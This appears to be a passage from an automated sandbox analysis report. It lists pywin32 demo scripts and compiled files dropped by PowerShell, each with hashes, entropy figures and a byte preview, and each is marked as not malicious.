                                                                                                                                                                                                            Preview:o..........gI........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...e.j...e.....Z.e.j...e.j...e.d.d.d.d.....Z.e.j...e...s>e.d.e...d.......G.d.d...d...Z.d.d...Z.e.d.k.rld.Z.d.....D.].Z.e.e.e.e...O.Z.qSe...e.....e...d.....e.....d.S.d.S.)......Nz.....test..win32rcparserz.test.rcz$Can't locate test.rc (should be at 'z.')c....................@...sL...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...DemoWindowc....................C...s....|.|._.d.S...N)...dlg_template)...selfr......r.....uC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32rcparser_demo.py..__init__....s......z.DemoWindow.__init__c....................C...s....|...t.j.....d.S.r....)..._DoCreate..win32guiZ.CreateDialogIndirect..r....r....r....r......CreateWindow...........z.DemoWindow.CreateWindowc....................C...s....|...t.j...S.r....).r....r....Z.DialogBoxIndirectr....r....r....r......DoModal....s......z.De
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):688
                                                                                                                                                                                                            Entropy (8bit):5.504138036264119
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1ieYTFgoghmt90YmahQm0/ae8rb2C/2IagjgswL/wS7:CLoghmcJaamGj8L2+UbwS7
                                                                                                                                                                                                            MD5:B9F307C648DE1E92B2BD1A06438FFA01
                                                                                                                                                                                                            SHA1:2B88AC0519604BE4E886248B8E55C0B2539592CF
                                                                                                                                                                                                            SHA-256:F8CC794B9F0574B147A51938EF78756AF4A843ABBABF9D2FB936E0EEA0C4B518
                                                                                                                                                                                                            SHA-512:93448B117A56065CDC9A454B515941DEEDBF70283F9A964E7D1A3B6CA432DFC3F4FE81F2C323337F67D40E35672C61A39D4E23EC067AD776703DF663D3BD4ED3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gZ........................@...s"...d.d.l.Z.d.d.l.Z.d.d...Z.e.....d.S.)......Nc....................C...sX...d.}.t.j.}.t.j.}.t...d.d.|...}.t.j.}.t.j.}.t...|.|.|...}.|.D.].\.}.}.}.t.|.|.|.....q.d.S.).Nr....)...win32con..GENERIC_READ..win32serviceZ.SC_MANAGER_ALL_ACCESSZ.OpenSCManagerZ.SERVICE_WIN32Z.SERVICE_STATE_ALLZ.EnumServicesStatus..print)...resumeZ.accessSCMZ.accessSrvZ.hscmZ.typeFilterZ.stateFilterZ.statusesZ.short_name..desc..status..r.....sC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32servicedemo.py..EnumServices....s........................r....).r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):856
                                                                                                                                                                                                            Entropy (8bit):5.749017121730809
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1/yGGBcY6bKT6CfAWLW9TBgsWGvZd7KpTqQqj6gdM+Sf0u0E9qHra/2IagWUmMe:C6+KWwzy9vZdW9wGgdM1f0VC2+xYEcn
                                                                                                                                                                                                            MD5:26F8C0D2AC733DD9515419DADCDC0F73
                                                                                                                                                                                                            SHA1:A58D8AF7DBD553C212DFF075F9FF5BE3F9A52557
                                                                                                                                                                                                            SHA-256:F36386C6D99CC9BA8A0FB7AB3F2DA0F229B1D2CC1A67681BE88B00DE91CD1D3D
                                                                                                                                                                                                            SHA-512:833A247DCB1AB38FC621F2CBF8C11467667730F4C84C590ABC5EB47E31F26A52184893C3661620E80034B38E8B9C0BFC72285F76E3CCD28499308B097D4AB911
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...e.j...Z.e.D.]HZ...e.d...e.j.k.r^e.d...Z.e...e.j.e.e.j...Z.e.d.e.....z.e...e.j.e.d.....W.q...e.j.y]..Z...z.e.j.e.j.k.rRe.d.e.j.....n...W.Y.d.Z.[.q.d.Z.[.w.w.q.d.S.).zC Finds any disconnected terminal service sessions and logs them off.....N..StateZ.SessionIdz.Logging off disconnected user:Tz.Can't kill that session:)...__doc__Z.pywintypesZ.win32ts..winerrorZ.WTSEnumerateSessionsZ.WTS_CURRENT_SERVER_HANDLE..sessions..sessionZ.WTSDisconnectedZ.sessionidZ.WTSQuerySessionInformationZ.WTSUserName..username..printZ.WTSLogoffSession..error..eZ.ERROR_ACCESS_DENIED..strerror..r....r.....~C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/win32ts_logoff_disconnected.py..<module>....s0...................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6569
                                                                                                                                                                                                            Entropy (8bit):5.601395102131219
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Cer8QmLjYpR3oDL/SalLLqpdslr+iXiBPxnPAI4GPDiJsn4lpaplm2QKpy:Ce0jY7aF2d2KiXiBPxnB4CQKlmxSy
                                                                                                                                                                                                            MD5:85DF27B042DD002D0E43A567B749881D
                                                                                                                                                                                                            SHA1:5F4FFD56E51740339DB079131B92895797363E77
                                                                                                                                                                                                            SHA-256:912661407EE3A5D11A9A4B839D8640816A9754067BF216BF82DC0C7216C59F3E
                                                                                                                                                                                                            SHA-512:348E191E58920F26388D592EAA24D10A7798A8F18D1223463C5FDB1919EB795191FE5831CA3565C13C0248E48EB4D1882D676EA9EA5A53BA4E8C4FB79C22F167
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sx...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.G.d.d...d...Z.d.d.d...Z.e.d.k.r.e.d.....d.d.l.Z.d.Z.d.e...Z.e.....Z.e.d...Z.zUe.e.d...Z.e.e.d...Z.e...e...d.......e...d.....e.d.e.d.d.e.e.e.d.......e.......e.d.e.d.e.j...e.j.e.d...d.......e.......W.e.e.f.D.].Z.z.e...e.....W.q...e.y.......Y.q.w.d.S.e.e.f.D.].Z.z.e...e.....W.q...e.y.......Y.q.w.w.d.S.).a.....Windows Process Control..winprocess.run launches a child process and returns the exit code..Optionally, it can:. redirect stdin, stdout & stderr to files. run the command as another user. limit the process's running time. control the process window (location, size, window state, desktop).Works on Windows NT, 2000 & XP. Requires Mark Hammond's win32.extensions...This code is free for any purpose, with no warranty of any kind..-- John B. Dell'Aquila <jbd@alum.mit.edu>......Nc....................C...s&...|...d...\.}.}.}.t...|.|.|.t.j.t.j...S.).z.. Login as spe
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):463
                                                                                                                                                                                                            Entropy (8bit):5.4119988692427965
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C170BJMwPItdMVe/EUTbv/jhEUsoHGa/2IaZ4Y+n:CCMoIzMg/EU1EQmK2j+
                                                                                                                                                                                                            MD5:C10783D8BF8DE80D4994A38F8358ABED
                                                                                                                                                                                                            SHA1:FC1DA49B72F640A2A7F0ACB2BA44A6D2470A55FD
                                                                                                                                                                                                            SHA-256:A2B06AF300AEC0FD082D87874D1C9529CE142FC59D4F568C70EDF3847E00D175
                                                                                                                                                                                                            SHA-512:E359EB358354163BF99018C3888F38833AABBD74F512567AC0298C1AF661C71C86E4BB05A02FE7D19DE998E6111F26545BEEA77180D0B4F9B8D8FF7F701916F5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g`........................@...sh...d.Z.d.d.l.Z.e.j...d...Z.e.j...e.....e.j.......e.r,e.j...d...Z.e.j...e.....e.j.......e.s.e.j...d.....d.S.).z=cat.py.a version of unix cat, tweaked to show off runproc.py......N.....z.Blah...)...__doc__..sys..stdin..read..data..stdout..write..flush..stderr..r....r.....lC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/pipes/cat.py..<module>....s..........................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1894
                                                                                                                                                                                                            Entropy (8bit):5.691560241662752
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:COdmdyyRIAgugag0RwFEOO+ugwt8irb8iSj2ll0WU9GajEW:Ctd7/gugag05OO+u720b8euNjEW
                                                                                                                                                                                                            MD5:7E98DA842262872E84E87FB2CFBB0DD5
                                                                                                                                                                                                            SHA1:FB7811FE8E9DD4AEA0C53AE227E126A9EB610026
                                                                                                                                                                                                            SHA-256:1C3E19F90A63702904F8819539F7C1186C6CD877535DDF93AE078CAA678F3C5E
                                                                                                                                                                                                            SHA-512:F29EE1F58B48A2C4AD41A0E79444A4A3BB07F6B600B485B491D09DA725328DF107BB09C97B6B236A497B140532164A629D01FF545D4C887DA18D4FE3D66D7070
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g/........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d...Z.e.d.k.r>e...Z.e...d...Z.e...e.d.......d.S.d.S.).z]runproc.py..start a process with three inherited pipes..Try to write to and read from those.......Nc....................@...s....e.Z.d.Z.d.d...Z.d.S.)...Processc....................C...s....t.....}.d.|._.t...|.d...\.}.|._.t...|.d...\.|._.}.t...|.d...\.|._.}.t.....}.|.|._.|.|._.|.|._.t.j.|._.t.....}.t...|.|.j.|.d.d.t.j...}.t...|.j.....|.|._.t...|.|.j.|.d.d.t.j...}.t...|.j.....|.|._.t...d.|.d.d.d.d.d.d.|...\.}.}.}.}.t...|.....t...|.....t...|.....t...t...|.j.d...d...|._.|.j...d.....|.j.......|.j.......t...t...|.j.d...d...|._.t d.t!|.j.."........t...t...|.j.d...d...|._#t d.t!|.j#."........d.S.).N.....r......wbz.hmmmmm....rbz.Read on stdout: z.Read on stderr: )$..win32securityZ.SECURITY_ATTRIBUTESZ.bInheritHandle..win32pipe..CreatePipeZ.hStdin_wZ.hStdout_rZ.hStderr_r..win32process..STARTUPINFO..hStdInput..hStdOutput
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2972
                                                                                                                                                                                                            Entropy (8bit):5.200778178054193
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:/B9ujlFA/oKEEIHw/8Y+1zHHoxLvCCCtuqZzJ114/jEDxT3B:p9ujlWQnw/P+1Tv34/ET3B
                                                                                                                                                                                                            MD5:6635600A07894561FA677136DB43C4D2
                                                                                                                                                                                                            SHA1:695C70B16C6ED42700F41D6BBCD1596632CC19D3
                                                                                                                                                                                                            SHA-256:1580EE371B0A28C652AF31372BC05DFB1077922A6E45A497F43891DF7387BA0B
                                                                                                                                                                                                            SHA-512:7F7CCE3A72915F74CEF6793320BFF2886A52D5C7E876528CD1972636D6FB58C05AB8A2D9E42014F56726D0C5B1E62CC058D87E69972090AF7F7028C1D562BA84
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import pywintypes..import win32api..import win32con..import win32gui..import win32print....pname = win32print.GetDefaultPrinter()..print(pname)..p = win32print.OpenPrinter(pname)..print("Printer handle: ", p)..print_processor = win32print.GetPrinter(p, 2)["pPrintProcessor"]..## call with last parm set to 0 to get total size needed for printer's DEVMODE..dmsize = win32print.DocumentProperties(0, p, pname, None, None, 0)..## dmDriverExtra should be total size - fixed size..driverextra = (.. dmsize - pywintypes.DEVMODEType().Size..) ## need a better way to get DEVMODE.dmSize..dm = pywintypes.DEVMODEType(driverextra)..dm.Fields = dm.Fields | win32con.DM_ORIENTATION | win32con.DM_COPIES..dm.Orientation = win32con.DMORIENT_LANDSCAPE..dm.Copies = 2..win32print.DocumentProperties(.. 0, p, pname, dm, dm, win32con.DM_IN_BUFFER | win32con.DM_OUT_BUFFER..)....pDC = win32gui.CreateDC(print_processor, pname, dm)..printerwidth = win32print.GetDeviceCaps(pDC, win32con.PHYSICALWIDTH)..printerhei
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5266
                                                                                                                                                                                                            Entropy (8bit):4.588785834086905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BIkyXHqPA7zV8AZq6soOShmCJxfkg/L7bOUr07/gNoy:BIkyXqIPV8vxoLhdxcg/nbO9T5y
                                                                                                                                                                                                            MD5:0ADB1C4864BA904A9920879D1E19865E
                                                                                                                                                                                                            SHA1:A1E18B39826CDE662883F50736BCACE93995AF58
                                                                                                                                                                                                            SHA-256:A5902DBC6F1CDA8FE1DE9E4443CA72851450D9CE8BBA12B4D2CF783EFEBEE372
                                                                                                                                                                                                            SHA-512:F067067874D8E73C5B0C68325947A086F4E8D114CBD60342F0A4C430815B9AEF893F61B3EE31A68FA5E8098E5383985A242CB9DA14435EC1EA8F21E2653A27A2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# rastest.py - test/demonstrate the win32ras module...# Much of the code here contributed by Jethro Wright.....import os..import sys....import win32ras....# Build a little dictionary of RAS states to decent strings...# eg win32ras.RASCS_OpenPort -> "OpenPort"..stateMap = {}..for name, val in list(win32ras.__dict__.items()):.. if name[:6] == "RASCS_":.. stateMap[val] = name[6:]....# Use a lock so the callback can tell the main thread when it is finished...import win32event....callbackEvent = win32event.CreateEvent(None, 0, 0, None)......def Callback(hras, msg, state, error, exterror):.. # print("Callback called with ", hras, msg, state, error, exterror).. stateName = stateMap.get(state, "Unknown state?").. print("Status is %s (%04lx), error code is %d" % (stateName, state, error)).. finished = state in [win32ras.RASCS_Connected].. if finished:.. win32event.SetEvent(callbackEvent).. if error != 0 or int(state) == win32ras.RASCS_Disconnected:.. #
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3848
                                                                                                                                                                                                            Entropy (8bit):4.952390063577855
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:wvnj9fICJ2lTt3Z1g0593U5g8gD9Lt/QztivGbmbhF6a:41VJCTVY05VU5g8gD9u8Ambf6a
                                                                                                                                                                                                            MD5:F7B568A21703388E17FD345AA7834936
                                                                                                                                                                                                            SHA1:6EEC7B024CDC68CE438F33384F0703EE9E60D272
                                                                                                                                                                                                            SHA-256:21247FF36050A81755E5C81D7B3F9E92B97211DBBE87F9693F193660D90D11C4
                                                                                                                                                                                                            SHA-512:99A983A22040D600EFC9C40AB5555B58762D9E9972FA79C90474B7838EAB94066C472EC32A585323877A7DF73B0340C301281F7CFAF061DEE54808232F1A35E2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""" Lists various types of information about current user's access token,.. including UAC status on Vista.."""....import pywintypes..import win32api..import win32con..import win32security..import winerror..from security_enums import (.. SECURITY_IMPERSONATION_LEVEL,.. TOKEN_ELEVATION_TYPE,.. TOKEN_GROUP_ATTRIBUTES,.. TOKEN_PRIVILEGE_ATTRIBUTES,.. TOKEN_TYPE,..)......def dump_token(th):.. token_type = win32security.GetTokenInformation(th, win32security.TokenType).. print("TokenType:", token_type, TOKEN_TYPE.lookup_name(token_type)).. if token_type == win32security.TokenImpersonation:.. imp_lvl = win32security.GetTokenInformation(.. th, win32security.TokenImpersonationLevel.. ).. print(.. "TokenImpersonationLevel:",.. imp_lvl,.. SECURITY_IMPERSONATION_LEVEL.lookup_name(imp_lvl),.. ).... print(.. "TokenSessionId:",.. win32security.GetTokenInformation(th, win32security.TokenS
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2588
                                                                                                                                                                                                            Entropy (8bit):5.8820314932947655
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CYgc6543yVMYmvKTFLcm4TfjnE/dKG/Cn7K5vxzMURd2og4b599mNqo8Bu:CYgV4iVMyLvyfjnE/8OTJzMURVb599md
                                                                                                                                                                                                            MD5:0B6C976E76166961F2839350FD3BE16C
                                                                                                                                                                                                            SHA1:6C6F287DC48A878AF06A1B6659A9B750C9B92AFE
                                                                                                                                                                                                            SHA-256:C849FC2D6799E2CF1AA3AC3A488F13A5024FF478A2C9DDF64DB29C530BC66AF0
                                                                                                                                                                                                            SHA-512:689E3CC6503CC06039398248A80CAF4FF24F69855D05B0B3DE5C0CFAECCF8BBE78ED42FA7E52EA2B4EBB75C7DD23F9085B712BDFA1467B8626A406E595A8FADD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.e.....Z.e...e.e.j...Z.e.e...Z.e.rCe.d.....e.e.....d.S.d.S.).zi Lists various types of information about current user's access token,. including UAC status on Vista......N)...SECURITY_IMPERSONATION_LEVEL..TOKEN_ELEVATION_TYPE..TOKEN_GROUP_ATTRIBUTES..TOKEN_PRIVILEGE_ATTRIBUTES..TOKEN_TYPEc....................C...sN...t...|.t.j...}.t.d.|.t...|.......|.t.j.k.r%t...|.t.j...}.t.d.|.t...|.......t.d.t...|.t.j.......t...|.t.j...}.t.d.....|.D.]0\.}.}.t...|...\.}.}.d...|...}.|.rX|.d.t.|.....d...7.}.t...d.|...}.t...d.|...}.t.d.|.|.|.|.....q<t.d.....t...|.t.j...}.|.D.]2\.}.}.t...|...\.}.}.d...|...}.|.r.|.d.t.|.....d...7.}.|.t.j.@.r.d.}.n.t...d.|...}.t.d.|.|.|.|.....qzz.t...|.t.j...}.t.d.|.....W.n...t.j.y...}...z.|.j.t.j.k.r..W.Y.d.}.~.d.S.d.}.~.w.w.t.d.t...|.t.j.......t.d.t...|.t.j.......t.d.t...|.t.j.......t.d.t...|.t.j.......t...|.t.j...}.t.d.|.t...|.......|.t.j k...r
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1242
                                                                                                                                                                                                            Entropy (8bit):5.928550722099095
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CLJQ1JwgtAvwgKZXSk1kLFNMVqOVNx7QUuYgEFq8fAZmm1pim32sqyPgu:CLJQcgtA4gKYkKLhCH7rdgEoQAImx2cp
                                                                                                                                                                                                            MD5:0ECA6FE16FBAAA1F79D7220EACF496C1
                                                                                                                                                                                                            SHA1:0DFE55B096A3C0FF74BE95575C75ED757299FD7E
                                                                                                                                                                                                            SHA-256:138D2D847E1D478FAA9697672390C8794F061B1E359904AE060CBE7D50BF7A11
                                                                                                                                                                                                            SHA-512:F5D9EAD46D2F0604F8E93C6658B6827F315B1029B4B7A5678B3AEEE07C79A6EF8587CC64E98B58E7A2BC2CC0F6F5EB8A270183C6809B897170C556863B95AC8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gt........................@...sB...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.d...e.j.f.f.Z.e.....Z.e...e.e.j...Z.e...e.d.e.....e...d.e.j...Z.e...d.d...d...Z.e.j.e.j.e.j.e.j.g.Z.e...e.e.e.....e.. e.e...Z!e!D.].Z"e#e"....qve.j.e.j.g.Z.e..$e.e.d.e.....e.. e.e...Z!e!D.].Z"e#e"....q.e..%e.....d.S.)......N)...ACCESS_MODE..ACE_FLAGS..TRUSTEE_FORM..TRUSTEE_TYPE..Z.SeEnableDelegationPrivilege..tmp)&Z.ntsecurityconZ.win32apiZ.win32conZ.win32fileZ.win32securityZ.security_enumsr....r....r....r....Z.LookupPrivilegeValueZ.SE_SECURITY_NAMEZ.SE_PRIVILEGE_ENABLEDZ.SE_CREATE_PERMANENT_NAMEZ.new_privs..GetCurrentProcess..phZ.OpenProcessTokenZ.TOKEN_ALL_ACCESS..thZ.AdjustTokenPrivilegesZ.GetPolicyHandleZ.POLICY_ALL_ACCESSZ.policy_handleZ.LookupAccountNameZ.tmp_sidZ.SE_DEBUG_NAMEZ.SE_TCB_NAMEZ.SE_RESTORE_NAMEZ.SE_REMOTE_SHUTDOWN_NAMEZ.privsZ.LsaAddAccountRightsZ.LsaEnumerateAccountRightsZ.privlistZ.priv..printZ.LsaRemoveAccountRight
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2716
                                                                                                                                                                                                            Entropy (8bit):6.00602309477803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CO980/QBAUE/rRB9C5NFLhFNH7POgEoftYM7/GeDEK2rh333vHSSbJ449bJb:CYVfjRDC5Nxt7btYO/vgn333vHSSV44D
                                                                                                                                                                                                            MD5:4A8F20EEFF8ACEE63F875E05637D1183
                                                                                                                                                                                                            SHA1:B59C847D9906CE1FD93AC8CD44238D41FB91925D
                                                                                                                                                                                                            SHA-256:A46627499CE6E504AF7E5231F708B2DFC5CABDD705DE038403B206AF9D78FA38
                                                                                                                                                                                                            SHA-512:5B9151F6869C0724E604BAD577ED26427C62CA22339A9E1C76EB9B51FE162E5EABB8F0D6A2EE788466FBEE619CCAEEA4A37C909417C2E5DCB6F479DC89F0A58C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g!........................@...sN...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...e.j...e.....d...Z.e.e.d...Z.e...d.....e.......e.d.e.....e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.d...e.j.f.f.Z.e.....Z.e...e.e.j...Z e..!e d.e.....e.j"e.j#B.e.j$B.e.j%B.Z&e..'e.e&..Z(e(.)..Z*e*d.u.r.e..+..Z*e(.,..Z-e-d.u.r.e..+..Z-e...e e.j/..d...Z0e..1d.d...d...Z2e..1d.d...d...Z3i.Z4d.e4d.<.d.e4d.<.e.j5e4d.<.e.j6e4d.<.e0e4d.<.i.Z7d.e7d.<.d.e7d.<.e.j8e7d.<.e.j6e7d.<.d.e7d.<.i.Z9d.e9d.<.d.e9d.<.e.j5e9d.<.e.j6e9d.<.e3e9d.<.g.Z:e:.;e4e.j<e.j=e.j>d.......e:.;e4e.j<e.j?e.j>d.......e:.;e7e.j<e.j=e.j>d.......e:.;e7e.j<e.j?e.j>d.......e*.@e:....g.Z:e:.;e7e.j<e.jAe.jBd.......e:.;e7e.j<e.jCe.jDd.......e:.;e9e.j<e.jCe.jEd.......e:.;e4e.j<e.jCe.j>d.......e-.@e:....e(.Fd.e*d.....e(.Gd.e-d.....e(.He3d.....e..Ie.e&e(....d.S.)......N)...ACCESS_MODE..ACE_FLAGS..TRUSTEE_FORM..TRUSTEE_TYPEz.win32security_test.txt..wz.Hello from Python
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):909
                                                                                                                                                                                                            Entropy (8bit):5.577511404420008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CwPwtzmcVZn2ZnEkLjWMVBfAZ3wbW6r+3htHV628:CwPwtzhPOnjLTAgW6kY28
                                                                                                                                                                                                            MD5:424BE8DF5BC848B0E2A5EE2AF910679F
                                                                                                                                                                                                            SHA1:2AC0B2B17B9F50AEB80E617212C6FBA9F4C98FAE
                                                                                                                                                                                                            SHA-256:A0F82B578B19457409A7F049E2929170198093C1F3D49257E1ADF05E7F250772
                                                                                                                                                                                                            SHA-512:EE4BC18ADB10F6DB201B3B5A0BC4EEC980D4EBD40ACCFEC3D815379EBB1BE6A2C25088C7297B0C9CCAF0158945EF0816CCDB2D510003C1C4690FAB091D4B86F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...d.e.j...Z.e...e.e.j...\.Z.Z.Z.Z.Z.e.e.e.e.e.e.....e...e.e.j...Z.e.e.....e...e.e.j...\.Z.Z.e.e.e.....e...e.e.j...\.Z.Z.e.e.e.....e...e.e.j...Z.e.d.e.....e...e.....d.S.)......NZ.rupolez.server role: ).Z.ntsecurityconZ.win32apiZ.win32fileZ.win32securityZ.GetPolicyHandleZ.POLICY_ALL_ACCESSZ.policy_handleZ.LsaQueryInformationPolicyZ.PolicyDnsDomainInformationZ.domain_nameZ.dns_domain_nameZ.dns_forest_nameZ.domain_guidZ.domain_sid..printZ.PolicyAuditEventsInformationZ.event_audit_infoZ.PolicyPrimaryDomainInformationZ.sidZ.PolicyAccountDomainInformationZ.PolicyLsaServerRoleInformationZ.server_roleZ.LsaClose..r....r.....{C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/get_policy_info.py..<module>....s@...................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1007
                                                                                                                                                                                                            Entropy (8bit):5.8839679420792255
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:COWJi5DTmkLFNMVqOVNx7QUuYgEFq8fAZCsAC5Iv2LFsyPD:CHJi5DxLhCH7rdgEoQA1B5Iv2RBPD
                                                                                                                                                                                                            MD5:65283AEEDF60D153253900DA8DEC09C3
                                                                                                                                                                                                            SHA1:D5A75FC3A5F9DAD844830FDA9150677805A0412B
                                                                                                                                                                                                            SHA-256:19840D803DDAA0BBB48EEBEB0C2DFB6F6AE5FD1DAD37CD807FFF134E5F2D3E25
                                                                                                                                                                                                            SHA-512:B343951BA001B17D9C88FAB153958D9FEB9E79342AD1432E3EBF6835CBD47E6F20F5512D9D7A55F4A1B814AFDEF187D06ECB7908BD0D9C75C9A2CB317A6340C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
